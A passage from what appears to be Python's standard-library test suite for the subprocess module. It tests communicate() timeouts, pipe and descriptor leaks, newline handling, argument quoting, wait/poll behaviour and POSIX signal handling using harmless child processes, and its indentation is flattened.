self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_ouput(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
import _bootlocale
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = _bootlocale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
_bootlocale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
_bootlocale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
